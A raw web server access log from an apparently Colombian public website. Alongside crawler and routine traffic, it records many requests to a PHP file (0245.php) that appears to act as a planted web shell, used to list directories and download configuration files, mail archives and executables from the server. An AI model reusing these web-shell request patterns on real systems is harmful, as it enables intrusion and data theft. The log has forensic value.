35.89.226.185 - - [19/Jun/2024:02:59:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202901%20AL%203000/RESOLUCION%202906%20DE%202007.pdf HTTP/1.1" 304 -
201.245.192.253 - - [19/Jun/2024:02:59:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:02:59:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.110.111 - - [19/Jun/2024:03:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmysql%5C&f=README&ft=code&white=1 HTTP/1.1" 200 1374
201.245.192.253 - - [19/Jun/2024:03:00:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:00:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.40.118 - - [19/Jun/2024:03:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=ServidordelMes_Equidad.flv&ft=download&white=1 HTTP/1.1" 200 12127891
47.128.121.249 - - [19/Jun/2024:03:01:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006&f=RESOLUCION+893+DE+2006.PDF&ft=download HTTP/1.1" 200 47975
47.128.116.168 - - [19/Jun/2024:03:01:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2809.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [19/Jun/2024:03:01:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:03:01:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.34.145 - - [19/Jun/2024:03:01:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=browse_foreigners.php&ft=download HTTP/1.1" 200 1569
172.22.2.4 - - [19/Jun/2024:03:02:00 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [19/Jun/2024:03:02:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.21.107 - - [19/Jun/2024:03:02:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/server_engines.php%27%20%20%20%20%20.%20PMA_URL_getCommon(array(%27engine%27%20=%3E%20%20%20%20$engine))%20.%20%27 HTTP/1.1" 403 1006
216.245.221.92 - - [19/Jun/2024:03:02:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:03:02:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.20.86 - - [19/Jun/2024:03:02:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=MERCURY.BAK&ft=download HTTP/1.1" 200 7297
47.128.57.122 - - [19/Jun/2024:03:02:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Cwebalizer&f=webalizer.php&ft=download HTTP/1.1" 200 701
172.22.2.4 - - [19/Jun/2024:03:01:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.20.26 - - [19/Jun/2024:03:03:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Cwebalizer&f=daily_usage_201203.png&ft=download HTTP/1.1" 200 3278
201.245.192.253 - - [19/Jun/2024:03:03:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:03:03:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
172.22.2.4 - - [19/Jun/2024:03:02:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 43032
201.245.192.253 - - [19/Jun/2024:03:03:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.42.157 - - [19/Jun/2024:03:03:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimg&f=portada_quimicos.jpg&ft=download HTTP/1.1" 200 129847
172.22.2.4 - - [19/Jun/2024:03:02:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 43032
47.128.127.85 - - [19/Jun/2024:03:04:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=tphone.bmp&ft=download HTTP/1.1" 200 2814
201.245.192.253 - - [19/Jun/2024:03:04:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.127.78 - - [19/Jun/2024:03:04:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150206-1420-958000.txt&ft=download HTTP/1.1" 200 2975
201.245.192.253 - - [19/Jun/2024:03:04:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.62.184 - - [19/Jun/2024:03:04:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5C&f=config.inc.php&ft=download HTTP/1.1" 200 1099
172.22.2.4 - - [19/Jun/2024:03:05:14 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
47.128.127.62 - - [19/Jun/2024:03:05:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=MERCURY.BK2&ft=download HTTP/1.1" 200 7303
201.245.192.253 - - [19/Jun/2024:03:05:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
156.59.198.136 - - [19/Jun/2024:03:05:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_p91gcl00q3hnmij5nmqntkim73 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:03:05:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [19/Jun/2024:03:05:48 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-273-11.docx HTTP/1.1" 304 -
156.59.198.136 - - [19/Jun/2024:03:05:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_0rkauktnvfho2hanrb3ld2ude3 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:03:06:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
156.59.198.136 - - [19/Jun/2024:03:06:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_phtildcqljg9hvqiecdu9kao06 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:03:06:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
156.59.198.135 - - [19/Jun/2024:03:06:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_tohbuoplfjd13o0a7i66ve5fn7 HTTP/1.0" 200 1034
156.59.198.136 - - [19/Jun/2024:03:07:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_fg228426oh292h02fmqt988cj0 HTTP/1.0" 200 1034
156.59.198.135 - - [19/Jun/2024:03:07:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_1ua9iqa8ojk9h1cipjeucfqbf0 HTTP/1.0" 200 1034
216.245.221.92 - - [19/Jun/2024:03:07:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:03:07:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:03:07:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.17.47 - - [19/Jun/2024:03:07:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Ccirculares%5C&f=5.pdf&ft=img&white=1 HTTP/1.1" 200 970511
47.128.116.242 - - [19/Jun/2024:03:08:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono&f=generator_config.txt&ft=download HTTP/1.1" 200 526
201.245.192.253 - - [19/Jun/2024:03:08:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:08:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [19/Jun/2024:03:08:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.45.137 - - [19/Jun/2024:03:08:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Crequerimientos_old%5C&f=header.php&ft=notepad HTTP/1.1" 200 925
172.22.2.4 - - [19/Jun/2024:03:07:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.30.235 - - [19/Jun/2024:03:08:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimg%5C&f=logo_alcaldia.gif&ft=download HTTP/1.1" 200 10220
47.128.42.237 - - [19/Jun/2024:03:09:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=dashboard.min.js&ft=download HTTP/1.1" 200 3209
201.245.192.253 - - [19/Jun/2024:03:09:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.19 - - [19/Jun/2024:03:09:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0469.pdf HTTP/1.1" 200 395724
172.22.2.4 - - [19/Jun/2024:03:07:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56779
201.245.192.253 - - [19/Jun/2024:03:09:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.22.136 - - [19/Jun/2024:03:09:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2010%5C&sort=0a HTTP/1.1" 200 72819
47.128.21.110 - - [19/Jun/2024:03:10:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+51-100%5C&f=00000053.tif&white=1 HTTP/1.1" 200 107208
52.167.144.19 - - [19/Jun/2024:03:10:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/6032.pdf HTTP/1.1" 304 -
201.245.192.253 - - [19/Jun/2024:03:10:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.20.255 - - [19/Jun/2024:03:10:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages&f=page16.swf&ft=download HTTP/1.1" 200 20133
201.245.192.253 - - [19/Jun/2024:03:10:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.119.0 - - [19/Jun/2024:03:10:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=bearhlp-en.htm&ft=download HTTP/1.1" 200 17878
47.128.22.115 - - [19/Jun/2024:03:11:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Cwebalizer%5C&f=webalizer.exe&ft=img&white=1 HTTP/1.1" 200 20239
201.245.192.253 - - [19/Jun/2024:03:11:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
156.59.198.135 - - [19/Jun/2024:03:11:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_ogh24h154dr3n9a9m6f5iiant3 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:03:11:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:12:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [19/Jun/2024:03:12:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:03:12:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.79.106 - - [19/Jun/2024:03:12:37 -0500] "GET /Publicaciones/2024EE57284.pdf HTTP/1.1" 404 227
136.25.48.138 - - [19/Jun/2024:03:12:12 -0500] "GET /Residuos/farmaceutica/files/guia_farmaceuticas.pdf HTTP/1.1" 200 11071842
156.59.198.135 - - [19/Jun/2024:03:13:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_ur4iuqctap8psk0hpkutnvgvm2 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:03:13:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [19/Jun/2024:03:13:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
156.59.198.135 - - [19/Jun/2024:03:13:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_l9bavgm9u9m32et9dfgf9d36l2 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:03:13:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:14:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:14:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [19/Jun/2024:03:12:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Jun/2024:03:13:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [19/Jun/2024:03:15:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:03:15:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.50 - - [19/Jun/2024:03:16:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/1891.pdf HTTP/1.1" 200 498494
201.245.192.253 - - [19/Jun/2024:03:16:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:16:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.54.89 - - [19/Jun/2024:03:17:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Ctmp&f=ib9744.tmp&ft=download HTTP/1.1" 200 -
216.245.221.92 - - [19/Jun/2024:03:17:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:03:17:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.21.0 - - [19/Jun/2024:03:17:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5C&f=service.exe&ft=img&white=1 HTTP/1.1" 200 60928
201.245.192.253 - - [19/Jun/2024:03:17:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:17:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33866
201.245.192.253 - - [19/Jun/2024:03:17:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33759
66.249.79.106 - - [19/Jun/2024:03:17:48 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/restauracion/sitio/55_artic/xtras/2.pdf HTTP/1.1" 404 1018
47.128.122.168 - - [19/Jun/2024:03:18:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Canti%5C&f=2.zip&ft=notepad&white=1 HTTP/1.1" 200 127661
157.55.39.57 - - [19/Jun/2024:03:18:11 -0500] "GET /Publicaciones/2024EE107830.pdf HTTP/1.1" 404 228
40.77.167.50 - - [19/Jun/2024:03:18:16 -0500] "GET /BLA/resoluciones/AUTOS%202022/0503.pdf HTTP/1.1" 200 368885
201.245.192.253 - - [19/Jun/2024:03:18:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.120.141 - - [19/Jun/2024:03:18:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+351-400&f=00000372.tif&ft=download HTTP/1.1" 200 253603
201.245.192.253 - - [19/Jun/2024:03:18:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [19/Jun/2024:03:18:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.58.142 - - [19/Jun/2024:03:18:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cboletinlegal%5C&f=boletin.php&ft=notepad&white=1 HTTP/1.1" 200 3924
47.128.58.0 - - [19/Jun/2024:03:19:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150714-1935-263000.txt&ft=download HTTP/1.1" 200 813
47.128.58.13 - - [19/Jun/2024:03:19:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=hangup32&ft=download HTTP/1.1" 200 2964
201.245.192.253 - - [19/Jun/2024:03:19:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:03:19:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
95.152.62.252 - - [19/Jun/2024:03:19:49 -0500] "GET / HTTP/1.0" 200 319
207.46.13.107 - - [19/Jun/2024:03:19:52 -0500] "GET /Publicaciones/2024EE110713.pdf HTTP/1.1" 404 228
172.22.2.4 - - [19/Jun/2024:03:18:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57136
47.128.24.93 - - [19/Jun/2024:03:19:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150901-1059-941000.txt&ft=download HTTP/1.1" 200 733
201.245.192.253 - - [19/Jun/2024:03:20:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.21.120 - - [19/Jun/2024:03:20:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccomments&f=index.php&ft=download HTTP/1.1" 200 4916
172.22.2.4 - - [19/Jun/2024:03:18:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:03:20:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.57.64 - - [19/Jun/2024:03:20:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=loader.exe&imgsize=100 HTTP/1.1" 200 68096
201.245.192.253 - - [19/Jun/2024:03:19:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
201.245.192.253 - - [19/Jun/2024:03:20:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33759
40.77.167.50 - - [19/Jun/2024:03:20:51 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [19/Jun/2024:03:20:52 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [19/Jun/2024:03:20:52 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:03:20:52 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:03:20:53 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:03:20:53 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:03:20:53 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:03:20:53 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:03:20:53 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:03:20:53 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:03:20:53 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:03:20:53 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
66.249.79.104 - - [19/Jun/2024:03:21:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7243.pdf HTTP/1.1" 200 393450
172.22.2.4 - - [19/Jun/2024:03:19:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
172.22.2.4 - - [19/Jun/2024:03:21:21 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7588
201.245.192.253 - - [19/Jun/2024:03:21:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.79.104 - - [19/Jun/2024:03:21:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5689.pdf HTTP/1.1" 200 248802
201.245.192.253 - - [19/Jun/2024:03:21:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [19/Jun/2024:03:22:06 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [19/Jun/2024:03:22:09 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [19/Jun/2024:03:22:10 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
172.22.2.4 - - [19/Jun/2024:03:22:11 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [19/Jun/2024:03:22:11 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
201.245.192.253 - - [19/Jun/2024:03:22:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [19/Jun/2024:03:22:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:03:22:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
136.25.48.138 - - [19/Jun/2024:03:22:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/0288.pdf HTTP/1.1" 200 418763
66.249.79.98 - - [19/Jun/2024:03:22:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5515.pdf HTTP/1.1" 200 113741
66.249.79.97 - - [19/Jun/2024:03:23:14 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/x%20restauracion/sitio/22_proye/xtras_in/cni_3.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [19/Jun/2024:03:23:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [19/Jun/2024:03:23:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:03:23:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:24:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:24:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.79.97 - - [19/Jun/2024:03:24:38 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/447.pdf HTTP/1.1" 304 -
